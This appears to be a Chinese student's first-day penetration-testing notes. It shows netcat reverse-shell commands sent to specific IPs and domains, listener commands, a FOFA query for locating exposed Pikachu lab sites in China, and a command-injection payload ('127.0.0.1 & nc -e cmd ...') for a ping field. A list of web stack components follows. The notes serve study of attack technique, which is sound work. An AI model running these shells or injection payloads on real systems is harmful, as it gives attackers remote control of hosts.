Day1 xiaodi学习篇

nc -e cmd 47.12.112.215 5577
-e:将本机的cmd权限移交到这个ip地址的5577端口
nc -lvvp 5577
监听本机端口5577
内网可以给到xiaodi8，xiaodi8不能给到内网
解决方法：路由器端口映射
ncat www.xiaodi8.com 5566 -e /bin/bash
将linux的bin/bash类似于windows的cmd窗口权限回弹到www.xiaodi.com的5566端口
nc -lvvp 5566
长向反向连接看以什么为参照物，一般是以渗透主机为标准
自己出去是正向连接，别人连接自己是反向连接
fofa.so直接搜索：
“pikachu” && country=“CN” && title==“Get the pikachu”
RCE----------exec “ping”
将nc上传到它的服务器上头去，然后再利用nc反弹cmd
127.0.0.1 & ipconfig
127.0.0.1 & nc -e cmd 0.0.0.0 5566
nc -lvvp 5566
web应用环境架构类：
理解不同 web应用组成角色功能架构
开发语言、程序源码、中间件容器、数据库类型、服务器操作系统、第三方软件等等
开发语言：asp，php，aspx，jsp，java，python，ruby，go，html，javascript等
程序源码：根据开发语言分类；应用类型分类；开源CMS分类；开发框架分类等中间件容器：IIS，Apache，Nginx，Tomcat，Weblogic，Jboos，glasshfish等
数据库类型：Access，Mysql，Mssql，Oracle，db2，Sybase，Redis，MongoDB等
服务器操作系统：windows系列，Linux系列，Mac系列
第三方软件：phpmyadmin，vs-ftpd，VNC，ELK，Openssh等